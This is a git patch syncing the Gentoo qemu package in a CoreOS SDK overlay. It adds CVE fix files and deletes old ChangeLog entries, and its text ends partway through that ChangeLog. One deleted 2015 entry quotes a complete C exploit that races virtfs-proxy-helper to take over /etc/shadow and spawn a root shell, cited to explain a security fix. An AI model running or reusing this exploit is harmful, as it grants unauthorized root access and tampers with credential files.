From 5cd9f4489bfa6e275c47a2e1b200a8139f767a9d Mon Sep 17 00:00:00 2001 From: Nick Owens Date: Tue, 29 Nov 2016 13:15:25 -0800 Subject: [PATCH] app-emulation/qemu: sync qemu-2.7.0-r7 --- .../app-emulation/qemu/ChangeLog | 792 --------- .../app-emulation/qemu/ChangeLog-2015 | 1536 ----------------- .../app-emulation/qemu/Manifest | 33 +- .../qemu/files/qemu-2.7.0-CVE-2016-7155.patch | 81 + .../qemu/files/qemu-2.7.0-CVE-2016-7156.patch | 62 + .../files/qemu-2.7.0-CVE-2016-7157-1.patch | 28 + .../files/qemu-2.7.0-CVE-2016-7157-2.patch | 27 + .../qemu/files/qemu-2.7.0-CVE-2016-7170.patch | 40 + .../qemu/files/qemu-2.7.0-CVE-2016-7421.patch | 34 + .../qemu/files/qemu-2.7.0-CVE-2016-7422.patch | 38 + .../qemu/files/qemu-2.7.0-CVE-2016-7423.patch | 31 + .../qemu/files/qemu-2.7.0-CVE-2016-7466.patch | 26 + .../qemu/files/qemu-2.7.0-CVE-2016-7907.patch | 45 + .../qemu/files/qemu-2.7.0-CVE-2016-7908.patch | 52 + .../qemu/files/qemu-2.7.0-CVE-2016-7909.patch | 32 + .../files/qemu-2.7.0-CVE-2016-7994-1.patch | 25 + .../files/qemu-2.7.0-CVE-2016-7994-2.patch | 26 + .../qemu/files/qemu-2.7.0-CVE-2016-8576.patch | 61 + .../qemu/files/qemu-2.7.0-CVE-2016-8577.patch | 34 + .../qemu/files/qemu-2.7.0-CVE-2016-8578.patch | 58 + .../qemu/files/qemu-2.7.0-CVE-2016-8668.patch | 30 + .../files/qemu-2.7.0-CVE-2016-8669-1.patch | 29 + .../files/qemu-2.7.0-CVE-2016-8669-2.patch | 34 + .../qemu/files/qemu-2.7.0-CVE-2016-8909.patch | 31 + .../qemu/files/qemu-2.7.0-CVE-2016-8910.patch | 29 + .../qemu/files/qemu-2.7.0-CVE-2016-9102.patch | 21 + .../qemu/files/qemu-2.7.0-CVE-2016-9103.patch | 27 + .../qemu/files/qemu-2.7.0-CVE-2016-9104.patch | 92 + .../qemu/files/qemu-2.7.0-CVE-2016-9105.patch | 25 + .../qemu/files/qemu-2.7.0-CVE-2016-9106.patch | 27 + ...qemu-2.7.0.ebuild => qemu-2.7.0-r7.ebuild} | 37 +- .../app-emulation/qemu/qemu-9999.ebuild | 6 +- 32 files changed, 1111 insertions(+), 2338 deletions(-) delete mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog delete mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog-2015 create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7155.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7156.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-1.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-2.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7170.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7421.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7422.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7423.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7466.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7907.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7908.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7909.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-1.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-2.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8576.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8577.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8578.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8668.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-1.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-2.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8909.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8910.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9102.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9103.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9104.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9105.patch create mode 100644 sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9106.patch rename sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/{qemu-2.7.0.ebuild => qemu-2.7.0-r7.ebuild} (91%) diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog deleted file mode 100644 index 643d1485ed..0000000000 --- a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog +++ /dev/null @@ -1,792 +0,0 @@ -# ChangeLog for app-emulation/qemu -# Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2 -# (auto-generated from git log) - -*qemu-9999 (09 Aug 2015) -*qemu-2.3.0-r5 (09 Aug 2015) -*qemu-2.3.0-r4 (09 Aug 2015) - - 09 Aug 2015; Robin H. Johnson +files/65-kvm.rules, - +files/bridge.conf, +files/qemu-1.7.0-cflags.patch, - +files/qemu-2.2.1-CVE-2015-1779-1.patch, - +files/qemu-2.2.1-CVE-2015-1779-2.patch, - +files/qemu-2.3.0-CVE-2015-3209.patch, - +files/qemu-2.3.0-CVE-2015-3214.patch, - +files/qemu-2.3.0-CVE-2015-3456.patch, - +files/qemu-2.3.0-CVE-2015-5154-1.patch, - +files/qemu-2.3.0-CVE-2015-5154-2.patch, - +files/qemu-2.3.0-CVE-2015-5154-3.patch, - +files/qemu-2.3.0-CVE-2015-5158.patch, - +files/qemu-2.3.0-CVE-2015-5165-1.patch, - +files/qemu-2.3.0-CVE-2015-5165-2.patch, - +files/qemu-2.3.0-CVE-2015-5165-3.patch, - +files/qemu-2.3.0-CVE-2015-5165-4.patch, - +files/qemu-2.3.0-CVE-2015-5165-5.patch, - +files/qemu-2.3.0-CVE-2015-5165-6.patch, - +files/qemu-2.3.0-CVE-2015-5165-7.patch, - +files/qemu-2.3.0-CVE-2015-5166.patch, +files/qemu-binfmt.initd-r1, - +metadata.xml, +qemu-2.3.0-r4.ebuild, +qemu-2.3.0-r5.ebuild, - +qemu-9999.ebuild: - proj/gentoo: Initial commit - - This commit represents a new era for Gentoo: - Storing the gentoo-x86 tree in Git, as converted from CVS. - - This commit is the start of the NEW history. - Any historical data is intended to be grafted onto this point. - - Creation process: - 1. Take final CVS checkout snapshot - 2. Remove ALL ChangeLog* files - 3. Transform all Manifests to thin - 4. Remove empty Manifests - 5. Convert all stale $Header$/$Id$ CVS keywords to non-expanded Git $Id$ - 5.1. Do not touch files with -kb/-ko keyword flags. - - Signed-off-by: Robin H. Johnson - X-Thanks: Alec Warner - did the GSoC 2006 migration - tests - X-Thanks: Robin H. Johnson - infra guy, herding this - project - X-Thanks: Nguyen Thai Ngoc Duy - Former Gentoo - developer, wrote Git features for the migration - X-Thanks: Brian Harring - wrote much python to improve - cvs2svn - X-Thanks: Rich Freeman - validation scripts - X-Thanks: Patrick Lauer - Gentoo dev, running new 2014 - work in migration - X-Thanks: Michał Górny - scripts, QA, nagging - X-Thanks: All of other Gentoo developers - many ideas and lots of paint on - the bikeshed - -*qemu-2.3.0-r6 (10 Aug 2015) - - 10 Aug 2015; Mike Frysinger - +files/qemu-2.3.0-virtio-serial.patch, +qemu-2.3.0-r6.ebuild: - qemu: fix from upstream for virtio-serial security issue #557206 - - 10 Aug 2015; Mike Frysinger qemu-2.3.0-r6.ebuild: - qemu: do not put directly into stable - -*qemu-2.3.1 (12 Aug 2015) - - 12 Aug 2015; Mike Frysinger +qemu-2.3.1.ebuild: - qemu: version bump to 2.3.1 - -*qemu-2.4.0 (12 Aug 2015) - - 12 Aug 2015; Mike Frysinger +qemu-2.4.0.ebuild: - qemu: version bump to 2.4.0 - - 14 Aug 2015; Mike Frysinger qemu-2.4.0.ebuild, - qemu-9999.ebuild: - depend on libepoxy for USE=opengl #557488 - - 14 Aug 2015; Mike Frysinger qemu-2.4.0.ebuild, - qemu-9999.ebuild: - move more deps to softmmu-only case - - These packages are only used when building softmmu binaries, so don't try - pulling them in when the user is building tools or user binaries. - - 14 Aug 2015; Mike Frysinger qemu-2.3.0-r4.ebuild, - qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, - qemu-2.4.0.ebuild, qemu-9999.ebuild: - switch to virtual/libusb to quiet repoman - - Now that the virtual requires the latest libusb, we can switch to that - rather than depending directly on libusb's version. - - 16 Aug 2015; Justin Lecher metadata.xml, - qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, - qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: - Use slot operators for ncurses - - Package-Manager: portage-2.2.20.1 - Signed-off-by: Justin Lecher - - 24 Aug 2015; Justin Lecher metadata.xml, - qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, - qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: - Use https by default - - Convert all URLs for sites supporting encrypted connections from http to - https - - Signed-off-by: Justin Lecher - - 24 Aug 2015; Mike Gilbert metadata.xml: - Revert DOCTYPE SYSTEM https changes in metadata.xml - - repoman does not yet accept the https version. - This partially reverts eaaface92ee81f30a6ac66fe7acbcc42c00dc450. - - Bug: https://bugs.gentoo.org/552720 - - 26 Aug 2015; Mike Frysinger qemu-2.3.0-r4.ebuild, - qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, - qemu-2.4.0.ebuild, qemu-9999.ebuild: - sys-libs/ncurses: move to SLOT=0 #557472 - - Use SLOT=0 for installing of main development files like other packages - so we can use other SLOTs for installing SONAME libs for binary packages. - - 28 Aug 2015; Manuel Rüger -qemu-2.3.0-r4.ebuild: - Remove vulnerable - - Package-Manager: portage-2.2.20.1 - - 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: - add new targets - - 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: - update seabios pin to version 1.8.2 - - 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: - add target sanity checks - - This way we know up front when a new target appears rather than when - someone happens to check & notice. - -*qemu-2.4.0-r1 (07 Sep 2015) - - 07 Sep 2015; Mike Frysinger - +files/qemu-2.4.0-CVE-2015-5225.patch, - +files/qemu-2.4.0-block-mirror-crash.patch, - +files/qemu-2.4.0-e1000-loop.patch, -qemu-2.4.0.ebuild, - +qemu-2.4.0-r1.ebuild: - various fixes/updates - - Sync in the updates from the 9999 ebuild: - - updated seabios pin - - add new targets - - add sanity checks for targets - - Add fix from upstream for blockcommit crashes #558396. - - Add fix from upstream for CVE-2015-5225 #558416. - - Add fix posted upstream (but not yet merged) for e1000 infinite loop - #559656. - - 08 Sep 2015; Agostino Sarubbo qemu-2.4.0-r1.ebuild: - amd64 stable wrt bug #558416 - - Package-Manager: portage-2.2.20.1 - RepoMan-Options: --include-arches="amd64" - - 08 Sep 2015; Agostino Sarubbo qemu-2.4.0-r1.ebuild: - x86 stable wrt bug #558416 - - Package-Manager: portage-2.2.20.1 - RepoMan-Options: --include-arches="x86" - - 11 Sep 2015; Mike Frysinger qemu-2.4.0-r1.ebuild, - qemu-9999.ebuild: - require mesa[egl] too - - Upstream commit 7ced9e9f6da2257224591b91727cfeee4f3977fb made the egl - layer of mesa a requirement. - - 16 Sep 2015; Mike Frysinger qemu-9999.ebuild: - switch USE=tls to USE=gnutls #560574 - - Upstream no longer has dedicated configuration options for tls settings. - Instead, it's all run through the gnutls feature test. - - We require newer versions of gnutls because supporting older ones gets a - bit messy -- qemu might leverage libgcrypt or nettle depending on how the - gnutls package was built. By forcing the latest version, we can simplify - and only require nettle. This isn't a big deal as it's already stable. - - 26 Sep 2015; Mike Frysinger qemu-9999.ebuild: - add tilegx linux-user target #561322 - - 29 Sep 2015; Mike Frysinger qemu-9999.ebuild: - update smartcard configure flag #561670 - -*qemu-2.4.0.1 (10 Oct 2015) - - 10 Oct 2015; Mike Frysinger - +files/qemu-2.4.0-CVE-2015-6855.patch, - +files/qemu-2.4.0-CVE-2015-7295-1.patch, - +files/qemu-2.4.0-CVE-2015-7295-2.patch, - +files/qemu-2.4.0-CVE-2015-7295-3.patch, +qemu-2.4.0.1.ebuild: - version bump to 2.4.0.1 #562594 - - This also includes security fixes for #560760 #560550 #560422. - -*qemu-2.4.0.1-r1 (15 Oct 2015) - - 15 Oct 2015; Markos Chandras - +files/qemu-2.4-mips-fix-mtc0.patch, +files/qemu-2.4-mips-fix-rdhwr.patch, - +files/qemu-2.4-mips-move-interrupts-new-func.patch, - +files/qemu-2.4-mips-wake-up-on-irq.patch, +qemu-2.4.0.1-r1.ebuild: - Backport a few MIPS patches. Bug #563162 - - Package-Manager: portage-2.2.23 - - 26 Oct 2015; Mike Frysinger qemu-9999.ebuild: - update qmp doc paths #564186 - -*qemu-2.4.1 (06 Nov 2015) - - 06 Nov 2015; Mike Frysinger +qemu-2.4.1.ebuild: - version bump to 2.4.1 #564990 - - 07 Nov 2015; Mike Frysinger qemu-2.4.0-r1.ebuild, - qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, - qemu-9999.ebuild: - force C locale for sorting to workaround glibc bug #564936 - - 23 Nov 2015; Mike Frysinger - +files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild: - update cflags patch #565866 - - 07 Dec 2015; Doug Goldstein qemu-2.3.0-r5.ebuild, - qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild, - qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, - qemu-9999.ebuild: - utilize xen-tools sub-slot - - app-emulation/xen-tools now exposes a sub-slot to help dependencies - rebuild when necessary. - - Signed-off-by: Doug Goldstein - -*qemu-2.4.1-r1 (08 Dec 2015) - - 08 Dec 2015; Mike Frysinger - +files/qemu-2.4.1-CVE-2015-7504.patch, - +files/qemu-2.4.1-CVE-2015-7512.patch, - +files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild: - add upstream security fixes #566792 #567144 - - 08 Dec 2015; Mike Frysinger metadata.xml, - qemu-9999.ebuild: - add USE=virgl for Virgil 3d GPU #566994 - - 08 Dec 2015; Mike Frysinger qemu-9999.ebuild: - switch to new libcacard release #561814 - -*qemu-2.4.0.1-r2 (14 Dec 2015) -*qemu-2.4.0-r2 (14 Dec 2015) -*qemu-2.3.1-r1 (14 Dec 2015) -*qemu-2.3.0-r7 (14 Dec 2015) - - 14 Dec 2015; Jason A. Donenfeld +qemu-2.3.0-r7.ebuild, - +qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild: - critical security fix - - The virtfs-proxy-helper program is not a safe binary to give caps. - The following exploit code demonstrates the vulnerability: - - ~=~=~=~= snip ~=~=~=~= - - /* == virtfshell == - * - * Some distributions make virtfs-proxy-helper from QEMU either SUID or - * give it CAP_CHOWN fs capabilities. This is a terrible idea. While - * virtfs-proxy-helper makes some sort of flimsy check to make sure - * its socket path doesn't already exist, it is vulnerable to TOCTOU. - * - * This should spawn a root shell eventually on vulnerable systems. - * - * - zx2c4 - * 2015-12-12 - * - * - * zx2c4@thinkpad ~ $ lsb_release -i - * Distributor ID: Gentoo - * zx2c4@thinkpad ~ $ ./virtfshell - * == Virtfshell - by zx2c4 == - * [+] Beginning race loop - * [+] Chown'd /etc/shadow, elevating to root - * [+] Cleaning up - * [+] Spawning root shell - * thinkpad zx2c4 # whoami - * root - * - */ - - #include - #include - #include - #include - #include - #include - #include - #include - - static int it_worked(void) - { - struct stat sbuf = { 0 }; - stat("/etc/shadow", &sbuf); - return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); - } - - int main(int argc, char **argv) - { - int fd; - pid_t pid; - char uid[12], gid[12]; - - sprintf(uid, "%d", getuid()); - sprintf(gid, "%d", getgid()); - - printf("== Virtfshell - by zx2c4 ==\n"); - - printf("[+] Beginning race loop\n"); - - while (!it_worked()) { - fd = inotify_init(); - unlink("/tmp/virtfshell/sock"); - mkdir("/tmp/virtfshell", 0777); - inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); - pid = fork(); - if (!pid) { - close(0); - close(1); - close(2); - execlp("virtfs-proxy-helper", "virtfs-proxy-helper", - "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", - NULL); - _exit(1); - } - read(fd, 0, 0); - unlink("/tmp/virtfshell/sock"); - symlink("/etc/shadow", "/tmp/virtfshell/sock"); - close(fd); - kill(pid, SIGKILL); - wait(NULL); - } - - printf("[+] Chown'd /etc/shadow, elevating to root\n"); - - system( "cp /etc/shadow /tmp/original_shadow;" - "sed 's/^root:.*/root::::::::/' /etc/shadow > - /tmp/modified_shadow;" - "cat /tmp/modified_shadow > /etc/shadow;" - "su -c '" - " echo [+] Cleaning up;" - " cat /tmp/original_shadow > /etc/shadow;" - " chown root:root /etc/shadow;" - " rm /tmp/modified_shadow /tmp/original_shadow;" - " echo [+] Spawning root shell;" - " exec /bin/bash -i" - "'"); - return 0; - } - - 15 Dec 2015; Mike Frysinger qemu-2.3.0-r5.ebuild, - qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild, - qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, - qemu-2.4.1-r1.ebuild, qemu-9999.ebuild: - drop virtfs-proxy-helper fcaps from all versions #568226 - -*qemu-2.4.1-r2 (15 Dec 2015) - - 15 Dec 2015; Mike Frysinger - +files/qemu-2.4.1-CVE-2015-7549.patch, - +files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild: - add upstream fixes for #567828 #568214 - - 16 Dec 2015; Agostino Sarubbo qemu-2.4.1-r2.ebuild: - amd64 stable wrt bug #567828 - - Package-Manager: portage-2.2.24 - RepoMan-Options: --include-arches="amd64" - Signed-off-by: Agostino Sarubbo - - 16 Dec 2015; Agostino Sarubbo qemu-2.4.1-r2.ebuild: - x86 stable wrt bug #567828 - - Package-Manager: portage-2.2.24 - RepoMan-Options: --include-arches="x86" - Signed-off-by: Agostino Sarubbo - -*qemu-2.5.0 (17 Dec 2015) - - 17 Dec 2015; Mike Frysinger +qemu-2.5.0.ebuild: - version bump to 2.5.0 - - 17 Dec 2015; Mike Frysinger - -files/qemu-2.2.1-CVE-2015-1779-1.patch, - -files/qemu-2.2.1-CVE-2015-1779-2.patch, - -files/qemu-2.3.0-CVE-2015-3209.patch, - -files/qemu-2.3.0-CVE-2015-3214.patch, - -files/qemu-2.3.0-CVE-2015-3456.patch, - -files/qemu-2.3.0-CVE-2015-5154-1.patch, - -files/qemu-2.3.0-CVE-2015-5154-2.patch, - -files/qemu-2.3.0-CVE-2015-5154-3.patch, - -files/qemu-2.3.0-CVE-2015-5158.patch, - -files/qemu-2.3.0-CVE-2015-5165-1.patch, - -files/qemu-2.3.0-CVE-2015-5165-2.patch, - -files/qemu-2.3.0-CVE-2015-5165-3.patch, - -files/qemu-2.3.0-CVE-2015-5165-4.patch, - -files/qemu-2.3.0-CVE-2015-5165-5.patch, - -files/qemu-2.3.0-CVE-2015-5165-6.patch, - -files/qemu-2.3.0-CVE-2015-5165-7.patch, - -files/qemu-2.3.0-CVE-2015-5166.patch, - -files/qemu-2.3.0-virtio-serial.patch, - -files/qemu-2.4.0-CVE-2015-5225.patch, - -files/qemu-2.4.0-CVE-2015-6855.patch, - -files/qemu-2.4.0-CVE-2015-7295-1.patch, - -files/qemu-2.4.0-CVE-2015-7295-2.patch, - -files/qemu-2.4.0-CVE-2015-7295-3.patch, - -files/qemu-2.4.0-block-mirror-crash.patch, - -files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild, - -qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild, - -qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild, - -qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild, - -qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild: - drop versions <2.4.1-r2 - - 20 Dec 2015; Mike Frysinger qemu-2.5.0.ebuild, - qemu-9999.ebuild: - disable libgcrypt usage #568856 - -*qemu-2.5.0-r1 (18 Jan 2016) - - 18 Jan 2016; Mike Frysinger - +files/qemu-2.5.0-CVE-2015-8558.patch, - +files/qemu-2.5.0-CVE-2015-8567.patch, - +files/qemu-2.5.0-CVE-2015-8701.patch, - +files/qemu-2.5.0-CVE-2015-8743.patch, - +files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild: - add upstream fixes for #567868 #568246 #570110 #570988 #571566 - - 24 Jan 2016; Michał Górny metadata.xml: - Replace all herds with appropriate projects (GLEP 67) - - Replace all uses of herd with appropriate project maintainers, or no - maintainers in case of herds requested to be disbanded. - - 24 Jan 2016; Michał Górny metadata.xml: - Set appropriate maintainer types in metadata.xml (GLEP 67) - - 26 Jan 2016; Agostino Sarubbo qemu-2.5.0-r1.ebuild: - amd64 stable wrt bug #571566 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="amd64" - Signed-off-by: Agostino Sarubbo - - 26 Jan 2016; Agostino Sarubbo qemu-2.5.0-r1.ebuild: - x86 stable wrt bug #571566 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="x86" - Signed-off-by: Agostino Sarubbo - - 15 Feb 2016; Doug Goldstein - -files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch, - -files/qemu-2.4-mips-fix-rdhwr.patch, - -files/qemu-2.4-mips-move-interrupts-new-func.patch, - -files/qemu-2.4-mips-wake-up-on-irq.patch, - -files/qemu-2.4.1-CVE-2015-7504.patch, - -files/qemu-2.4.1-CVE-2015-7512.patch, - -files/qemu-2.4.1-CVE-2015-7549.patch, - -files/qemu-2.4.1-CVE-2015-8345.patch, - -files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild, - -qemu-2.5.0.ebuild: - remove vulnerable versions - - Package-Manager: portage-2.2.26 - Signed-off-by: Doug Goldstein - - 15 Feb 2016; Patrick Lauer metadata.xml: - Remove unneeded useflag description from metadata.xml - - Package-Manager: portage-2.2.27 - - 19 Feb 2016; Robin H. Johnson metadata.xml: - restore USE=gnutls use desc for side-effects - - commit ea4d1e1fcc just removed the USE=tls, rather than updating it for - USE=gnutls. Per the description, it has side-effects of enabling - enabling WebSocket & disk quorum features. - - Package-Manager: portage-2.2.27 - - 28 Feb 2016; Doug Goldstein qemu-2.5.0-r1.ebuild: - fix arm64 dependencies - - arm/arm64 have some dependencies which are higher than other platforms. - Unfortunately the dependencies are not stable on arm but this package is - so arm updates will come later. - - Package-Manager: portage-2.2.26 - Signed-off-by: Doug Goldstein - - 28 Feb 2016; Matthew Thode qemu-2.5.0-r1.ebuild: - keywording arm64 - - merged on X-C1 - - Package-Manager: portage-2.2.26 - - 15 Mar 2016; Doug Goldstein qemu-2.5.0-r1.ebuild: - fix arm depends for libseccomp - - arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it. - - Package-Manager: portage-2.2.26 - Signed-off-by: Doug Goldstein - -*qemu-2.5.0-r2 (23 Mar 2016) - - 23 Mar 2016; Mike Frysinger - +files/qemu-2.5.0-CVE-2015-8613.patch, - +files/qemu-2.5.0-CVE-2015-8619.patch, - +files/qemu-2.5.0-CVE-2016-1714.patch, - +files/qemu-2.5.0-CVE-2016-1922.patch, - +files/qemu-2.5.0-CVE-2016-1981.patch, - +files/qemu-2.5.0-CVE-2016-2197.patch, - +files/qemu-2.5.0-CVE-2016-2198.patch, - +files/qemu-2.5.0-CVE-2016-2392.patch, - +files/qemu-2.5.0-rng-stack-corrupt-0.patch, - +files/qemu-2.5.0-rng-stack-corrupt-1.patch, - +files/qemu-2.5.0-rng-stack-corrupt-2.patch, - +files/qemu-2.5.0-rng-stack-corrupt-3.patch, - +files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch, - +files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild: - backport various upstream fixes - - 24 Mar 2016; Agostino Sarubbo qemu-2.5.0-r2.ebuild: - amd64 stable wrt bug #578044 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="amd64" - Signed-off-by: Agostino Sarubbo - - 24 Mar 2016; Agostino Sarubbo qemu-2.5.0-r2.ebuild: - x86 stable wrt bug #578044 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="x86" - Signed-off-by: Agostino Sarubbo - - 25 Mar 2016; Sergey Popov -qemu-2.5.0-r1.ebuild: - security cleanup - - Gentoo-Bug: 576420 - - Package-Manager: portage-2.2.28 - - 28 Mar 2016; Mike Frysinger qemu-2.5.0-r2.ebuild, - qemu-9999.ebuild: - use l10n.eclass to respect LINGUAS #577814 - -*qemu-2.5.0-r3 (28 Mar 2016) - - 28 Mar 2016; Mike Frysinger - +files/qemu-2.5.0-9pfs-segfault.patch, - +files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild: - add few more upstream fixes #573816 #578142 - - 29 Mar 2016; Agostino Sarubbo qemu-2.5.0-r3.ebuild: - amd64 stable wrt bug #573816 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="amd64" - Signed-off-by: Agostino Sarubbo - - 29 Mar 2016; Agostino Sarubbo qemu-2.5.0-r3.ebuild: - x86 stable wrt bug #573816 - - Package-Manager: portage-2.2.26 - RepoMan-Options: --include-arches="x86" - Signed-off-by: Agostino Sarubbo - - 20 Apr 2016; Mike Frysinger qemu-2.5.0-r3.ebuild, - qemu-9999.ebuild: - mention /dev/kvm perm updates in the readme/elog #580436 - -*qemu-2.5.1 (23 Apr 2016) - - 23 Apr 2016; Mike Frysinger - +files/qemu-2.5.1-CVE-2015-8558.patch, - +files/qemu-2.5.1-CVE-2016-4020.patch, - +files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild: - app-misc/qemu: version bump & bug fixes #579614 #580040 #580426 - - 12 May 2016; Mike Frysinger qemu-2.5.1.ebuild, - qemu-9999.ebuild: - use subslots w/nettle & gnutls #582836 - -*qemu-2.6.0 (17 May 2016) - - 17 May 2016; Mike Frysinger +qemu-2.6.0.ebuild, - qemu-9999.ebuild: - version bump to 2.6.0 #583212 - - 17 May 2016; Mike Frysinger - +files/qemu-2.5.1-xfs-linux-headers.patch, qemu-2.5.1.ebuild: - workaround breakage in xfs/linux headers #577810 - - Add upstream patch to workaround some combinations of xfsprogs & linux - headers so we don't have to worry about stable breakage anymore. This - fix is already in upstream & unstable versions. - - 18 May 2016; Austin English - files/qemu-binfmt.initd-r1: - use #!/sbin/openrc-run instead of #!/sbin/runscript - - 06 Jun 2016; Mike Frysinger qemu-2.5.0-r2.ebuild, - qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild, - qemu-9999.ebuild: - depend on jpeg SLOT=0 for building - - 07 Jun 2016; Mike Frysinger - +files/qemu-2.6.0-crypto-static.patch, qemu-2.6.0.ebuild, qemu-9999.ebuild: - fix static linking errors w/curl[ssl,curl_ssl_openssl] - - 21 Jun 2016; Mike Frysinger qemu-9999.ebuild: - drop kvm_stat to match upstream #586158 - - 29 Jun 2016; Alexey Shvetsov qemu-2.5.0-r2.ebuild, - qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild, - qemu-9999.ebuild: - adapt sys-infiniband to sys-fabric rename - - Package-Manager: portage-2.3.0_rc1 - - 01 Aug 2016; Mike Frysinger qemu-2.5.1.ebuild, - 